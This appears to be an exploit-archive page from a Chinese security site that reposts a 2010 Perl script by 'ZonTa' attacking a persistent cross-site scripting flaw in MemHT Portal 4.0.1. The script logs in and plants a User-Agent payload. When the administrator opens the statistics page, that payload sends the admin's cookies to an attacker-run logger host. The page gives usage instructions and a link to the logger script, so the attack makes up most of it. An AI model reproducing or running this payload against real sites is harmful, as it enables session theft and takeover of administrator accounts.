首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MemHT Portal 4.0.1 [user agent] Persistent Cross Site Scripting
来源:zontahackers[at]gmail[dot]com 作者:ZonTa 发布时间:2010-11-29  

#!/usr/bin/perl
# MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]
# by ZonTa - zontahackers[at]gmail[dot]com
#
# After successful inject wait for the admin to view statistic page.
# Fix is available : http://www.memht.com/news_149_MemHT-Portal-4-0-2.html

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;

my ($host,$id,$username,$password,$logger) = @ARGV;
 
my $http = new LWP::UserAgent;
my $u_agent = "]\"</td></tr><BODY ONLOAD=document.location=\"http://$logger?cookie=\"+document.cookie+\"&redirect=http://$host\">";
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);

Main::Exploit();

package Main;

sub Exploit
{   
    if (@ARGV != 5) {
        Main::Usage();
    }
    else {
        HTTP::UserAgent($u_agent);
        MemHT::Login();    
    }   
}   

sub Usage {
 
return print <<EOF;
+-------------------------------------------------------------------+
| MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability  |
+-------------------------[user agent]------------------------------+

by ZonTa - zontahackers[at]gmail[dot]com
 
Usage: perl exploit.pl host/path userId user pass logger[OPTIONS]

host: target host and memht path
userId: user id
user: valid username
pass: valid password
logger: PHP loging file
 
Example:
perl exploit.pl localhost/memht 2 foo secret 192.168.1.5/logger.php

Download Logger.php -> http://pastebin.com/K6E9AWrC

EOF
}

package MemHT;  
       
sub Login
{
    HTTP::Cookies($cookies);
    my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
    
    if ($response->content =~ /access denied/i) {
        print "Login Failed!\n";
  exit;
 }
 else {
  print "Logged In!\n";
  print "XSS injected !";
       
    } 
}

package HTTP;

sub UserAgent
{
    return $http->agent($_[0]);
}

sub Cookies
{
    return $http->default_header('Cookie' => $_[0]);
}
 
sub GET
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }   
    else {
        return $http->get($_[0]);
    }   
}
    
sub POST
{  
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->post('http://'.$_[0]);
    }   
    else {
        return $http->post($_[0]);
    }   
}
    
sub http_header
{
    return $http->default_header($_[0]);

# Greetz to Sri Lankans 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel Unix Sockets Loca
·CA Internet Security Suite 201
·Local Root Privilege Escalatio
·OTSTurntables 1.00.048 (m3u/of
·Hanso Player Version 1.4.0 (.m
·Linux Kernel 'setup_arg_pages(
·OSX/Intel - setuid shell x86_6
·Linux/ARM - add root user with
·NCH Officeintercom <= v5.20 Re
·Mediacoder 0.7.5.4792 Buffer O
·HP LaserJet Directory Traversa
·FoxPlayer v2.4.0 Denial of Ser
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved